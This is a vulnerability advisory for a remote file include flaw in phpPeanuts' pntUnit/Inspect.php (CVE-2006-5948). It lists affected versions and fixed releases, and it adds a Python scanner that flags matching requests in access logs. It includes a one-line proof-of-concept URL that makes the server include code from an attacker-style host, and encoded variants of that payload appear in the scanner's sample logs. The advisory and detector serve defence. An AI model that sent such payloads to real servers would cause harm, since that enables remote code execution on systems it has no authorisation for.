PHPPeanuts Inspect.PHP Remote File Include Vulnerability
BID:21057
Info
| Bugtraq ID: | 21057 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-5948 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 14 2006 12:00AM |
| Updated: | Mar 06 2007 09:05PM |
| Credit: | Hidayat Sagita is credited with the discovery of this vulnerability. |
| Vulnerable: | phpPeanuts phpPeanuts 1.2, phpPeanuts phpPeanuts 1.3 Beta 1, phpPeanuts phpPeanuts 1.2 beta 1, phpPeanuts phpPeanuts 1.2 alpha 2, phpPeanuts phpPeanuts 1.2 alpha 1, phpPeanuts phpPeanuts 1.1 |
| Not Vulnerable: | phpPeanuts phpPeanuts 1.3 Beta 1a, phpPeanuts phpPeanuts 1.2.0a |
Discussion
Exploit / POC
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://www.example.com/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://example1.copm/evil_code.txt ?
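As an added example (not part of the original advisory), the following Python code scans web server access logs for requests of the shape shown in the proof of concept: a hit on pntUnit/Inspect.php whose Include parameter carries a remote URL. The common/combined log format is an assumption, and the sample log lines, client addresses and host names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line of a common/combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with "scheme://" or a protocol-relative "//host".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
SCRIPT_SUFFIX = "/pntunit/inspect.php"  # script named in the advisory, lower-cased


def is_rfi_attempt(target):
    """Return True if target requests Inspect.php with a remote URL in Include."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(SCRIPT_SUFFIX):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name.lower() == "include" and REMOTE_RE.match(unquote(value)):
            return True
    return False


def scan(lines):
    """Return (client_address, request_target) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_rfi_attempt(match.group(1)):
            hits.append((line.split(" ", 1)[0], match.group(1)))
    return hits


# Constructed sample entries: documentation IP ranges and a .invalid host.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2006:10:00:01 +0000] "GET /app/pntUnit/Inspect.php?Include=http://host.invalid/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [14/Nov/2006:10:00:02 +0000] "GET /app/pntunit/inspect.php?include=hTTp%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.0" 200 512',
    '198.51.100.7 - - [14/Nov/2006:10:00:03 +0000] "GET /app/pntUnit/Inspect.php?Include=localTests.php HTTP/1.1" 200 900',
    '198.51.100.8 - - [14/Nov/2006:10:00:04 +0000] "GET /app/index.php?Include=http://host.invalid/x.txt HTTP/1.1" 404 0',
    '203.0.113.5 - - [14/Nov/2006:10:00:05 +0000] "GET /app/pntUnit/Inspect.php?Include=%2568ttp%253A%252F%252Fhost.invalid%252Fx HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(client, target)
```

The parameter name and script path are matched case-insensitively so that probing variants also surface in the results.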
Solution / Fix
Solution:
Please see the references for more information.
phpPeanuts phpPeanuts 1.1
- Cuyahoga phpPeanuts_1_2_0a.zip
  http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1_2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Download.html
phpPeanuts phpPeanuts 1.2 alpha 2
- Cuyahoga phpPeanuts_1_2_0a.zip
  http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1_2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Download.html
phpPeanuts phpPeanuts 1.2 beta 1
- Cuyahoga phpPeanuts_1_2_0a.zip
  http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1_2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Download.html
phpPeanuts phpPeanuts 1.2 alpha 1
- Cuyahoga phpPeanuts_1_2_0a.zip
  http://www.phppeanuts.org/site/index_php/Menu/23/download/phpPeanuts_1_2_0a.zip/pntHandler/WebLicenseAgreementPage/pntRef/12/pntScd/d/Download.html
phpPeanuts phpPeanuts 1.2
References
References:
- fixes in 1.2.0a (phpPeanuts)
- PHPPeanuts Homepage (Rings World)